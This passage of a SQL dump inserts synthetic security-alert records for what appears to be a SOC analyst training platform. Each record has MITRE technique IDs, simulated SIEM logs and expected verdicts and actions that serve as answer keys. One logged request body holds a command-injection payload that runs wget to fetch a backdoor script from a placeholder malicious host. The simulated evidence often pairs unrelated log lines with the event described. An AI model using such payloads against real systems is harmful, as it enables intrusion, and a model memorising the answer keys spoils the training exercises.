4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T04:12:55Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.2.5\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"web-server-01\\\",\\\"request_body\\\":\\\"id; wget http://malicious-site.com/backdoor.sh\\\",\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1306, 'Unauthorized IAM Role Assignment in AWS', 'high', 'AWS GuardDuty', 'An unauthorized IAM role was assigned to a user, potentially allowing elevated access to AWS resources.', 'Lateral Movement', 'T1078', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T07:30:10Z\",\"event_type\":\"role_assignment\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":null,\"username\":\"jane.smith\",\"hostname\":\"aws-management-console\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-27 06:51:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"jane.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate internal user\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for management console access\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized assignment of IAM roles can allow lateral movement within the AWS environment, indicating potential insider threat activity.\"}', 'Intermediate', 'CLOUD', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.769Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T07:30:10Z\\\",\\\"event_type\\\":\\\"role_assignment\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"aws-management-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1307, 'Anomalous Data Transfer to External S3 Bucket', 'medium', 'AWS GuardDuty', 'Large data transfer detected from an internal server to an external Amazon S3 bucket, potentially indicating data exfiltration.', 'Data Exfiltration', 'T1048', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T09:00:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.20\",\"dst_ip\":\"54.240.196.186\",\"username\":\"data_user\",\"hostname\":\"data-transfer-server\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for data operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"54.240.196.186\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP associated with unusual data transfer activities\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The large data transfer to an external S3 bucket without prior authorization suggests potential data exfiltration.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.769Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T09:00:45Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"54.240.196.186\\\",\\\"username\\\":\\\"data_user\\\",\\\"hostname\\\":\\\"data-transfer-server\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1308, 'False Positive: Legitimate Security Scan Detected as Anomalous', 'low', 'Azure Defender', 'Routine security scanning activity mistakenly identified as a potential threat due to high volume of network connections.', 'Network Scanning', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T02:10:20Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.15\",\"dst_ip\":\"10.0.0.20\",\"username\":\"scan_user\",\"hostname\":\"security-scanner\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for security scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address as scan target\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scanning\",\"analysis_notes\":\"The activity matches known security scanning patterns and originates from a trusted internal source.\"}', 'Intermediate', 'CLOUD', 5, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T02:10:20Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"10.0.0.20\\\",\\\"username\\\":\\\"scan_user\\\",\\\"hostname\\\":\\\"security-scanner\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1309, 'Unauthorized Access to Serverless Function Detected', 'high', 'AWS GuardDuty', 'An unauthorized user attempted to execute a sensitive serverless function, indicating a potential attempt to gain elevated privileges.', 'Execution', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T05:50:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"192.168.4.10\",\"username\":\"unauthorized_user\",\"hostname\":\"serverless-function-01\",\"request_body\":null,\"command_line\":\"aws lambda invoke --function-name sensitiveFunction\"}', '2026-02-24 03:24:16', '2026-02-27 06:51:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"aws lambda invoke --function-name sensitiveFunction\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used to invoke sensitive serverless functions without authorization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The use of an unauthorized account to access a sensitive function suggests a potential privilege escalation attempt.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.771Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T05:50:15Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"192.168.4.10\\\",\\\"username\\\":\\\"unauthorized_user\\\",\\\"hostname\\\":\\\"serverless-function-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"aws lambda invoke --function-name sensitiveFunction\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1310, 'False Positive: Legitimate Cloud Configuration Change', 'low', 'GCP SCC', 'A legitimate change in cloud configuration was incorrectly flagged as suspicious due to unusual pattern of activity.', 'Configuration Change', 'T1578', 0, 'Closed', 232, '{\"timestamp\":\"2026-02-24T11:20:00Z\",\"event_type\":\"configuration_change\",\"src_ip\":\"192.168.5.25\",\"dst_ip\":null,\"username\":\"admin_user\",\"hostname\":\"gcp-console\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-03-09 18:23:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used for cloud management\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Authorized user performing regular maintenance\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"configuration_change\",\"analysis_notes\":\"The activity corresponds to a scheduled maintenance window, and the user has proper permissions.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.772Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T11:20:00Z\\\",\\\"event_type\\\":\\\"configuration_change\\\",\\\"src_ip\\\":\\\"192.168.5.25\\\",\\\"dst_ip\\\":null,\\\"username\\\":\\\"admin_user\\\",\\\"hostname\\\":\\\"gcp-console\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1311, 'Potential Exfiltration via Misconfigured S3 Bucket', 'high', 'AWS GuardDuty', 'Data exfiltration is suspected due to a misconfigured S3 bucket allowing public access to sensitive files.', 'Data Exfiltration', 'T1537', 0, 'resolved', NULL, '{\"timestamp\":\"2026-02-24T08:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.42\",\"dst_ip\":\"192.168.2.30\",\"username\":null,\"hostname\":\"public-s3-bucket\",\"request_body\":\"GET /sensitive-data.csv\",\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-27 06:52:20', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP known for accessing misconfigured public resources\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data.csv\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Request for potentially sensitive data\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The public access to sensitive data indicates a misconfiguration that could lead to data exfiltration.\"}', 'Intermediate', 'CLOUD', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.773Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.42\\\",\\\"dst_ip\\\":\\\"192.168.2.30\\\",\\\"username\\\":null,\\\"hostname\\\":\\\"public-s3-bucket\\\",\\\"request_body\\\":\\\"GET /sensitive-data.csv\\\",\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1312, 'False Positive: Internal Network Activity Mistaken as Anomalous', 'low', 'Prisma Cloud', 'Regular internal network communications were mistaken as anomalous due to increased traffic levels.', 'Network Activity', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T10:15:34Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.10.15\",\"dst_ip\":\"192.168.10.20\",\"username\":\"network_service\",\"hostname\":\"internal-server-01\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:24:16', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in routine network operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address as communication target\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The traffic is consistent with regular internal operations and does not indicate malicious activity.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, 